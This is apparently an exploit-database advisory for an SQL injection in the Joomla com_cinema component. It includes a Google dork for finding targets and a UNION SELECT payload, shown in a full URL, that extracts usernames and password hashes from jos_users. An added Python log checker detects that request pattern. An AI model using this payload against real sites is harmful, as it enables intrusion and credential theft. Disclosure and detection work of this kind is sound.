Joomla! Component cinema - SQL Injection

EDB-ID: 13792
CVE: N/A
Platform: PHP
Date: 2010-06-09

=========================================================

# Exploit Title: Joomla component cinema SQL injection Vulnerability
# Date: 09 June 2010
# Author: Sudden_death (suddendeath404@yahoo.com)
# Software Link: N/A
# Tested on: Windows XP 2
# Platform / Tested on: Windows XP 2 SP 2
# category: webapps/0day
# myweb : http://sudden.isgreat.org/
# dork : inurl:option=com_cinema

======================================================================

# EXPLOIT / c0de

-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users--

# VULN IN HERE

http://www.site.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=[exploit]

# LIVE DEMO

http://www.site.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users--
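
# DETECTION (added example, not part of the original advisory)

A log check for the request pattern shown above: it flags com_cinema requests whose id parameter is not a plain integer, after undoing layered URL encoding and the /**/ comment-as-whitespace trick. The function names, keyword list and sample requests are constructed for illustration, and it assumes legitimate ids are plain non-negative integers.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Keywords that should never appear in a numeric record id.
SQL_KEYWORDS = re.compile(r"\b(union|select|from|concat)\b", re.I)
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # /**/ used in place of spaces
TRAILING_COMMENT = re.compile(r"(--|#)\s*$")

def normalise(value):
    """Undo layered URL encoding and replace SQL inline comments with spaces."""
    for _ in range(3):                 # bounded number of decoding passes
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = INLINE_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()

def inspect_request(url):
    """Return findings for one request URL; an empty list means nothing to report."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_cinema" not in query.get("option", []):
        return []                      # only the component named in the advisory
    findings = []
    for raw in query.get("id", []):
        value = normalise(raw)
        if re.fullmatch(r"\d+", value):  # assumption: legitimate ids are plain integers
            continue
        findings.append("non-numeric id")
        if SQL_KEYWORDS.search(value):
            findings.append("sql keywords in id")
        if TRAILING_COMMENT.search(value):
            findings.append("trailing sql comment")
    return findings

# Constructed sample requests (not taken from real logs).
SAMPLES = [
    "/index.php?option=com_cinema&Itemid=5&func=detail&id=42",
    "/index.php?option=com_cinema&func=detail&id=-1/**/union/**/select/**/1,2--",
    "/index.php?option=com_cinema&func=detail&id=-1%252F%252A%252A%252FUNION%252F%252A%252A%252FSelect%252F%252A%252A%252F1",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect_request(url) or "clean", "<-", url)
```

This only detects attempts; the fix belongs in the component, which should cast id to an integer or bind it as a query parameter before it reaches SQL.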


[#]-------------------------------------------------------------------

GREETZ TO WE FORUM:
-=-[ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org ]-=-

[#]-------------------------------------------------------------------

MY BROTHA :
| bumble_be | Mr.SoOofe | BobyPutrA | Syst3m_RtO | MISTERFRIBO | CS-31 | d43ngCyb3r | zee eichel | ne0 d4rk fl00d3r | Ichito-Bandito |
| james0baster | kaMtiEz | Man In Black | otong | r3m1ck's | shadowsmaker | SyNTaX ErRoR | iJoo | FLYFF666 | LOL1ds | Md_holic | cah_surip |
| angga | demnas | ELV1N4 | hateback | virgi | scr34mz | Kimmonosz | pL4nkt0n | RxN7 | z0mb13 | 45tr0_k1ll1n9 | huda_style | zalezero | CireSoft49 | 
| r4tu_le64h | huda_style | ranggamagic | maximize13 | and you |
[#]-------------------------------------------------------------------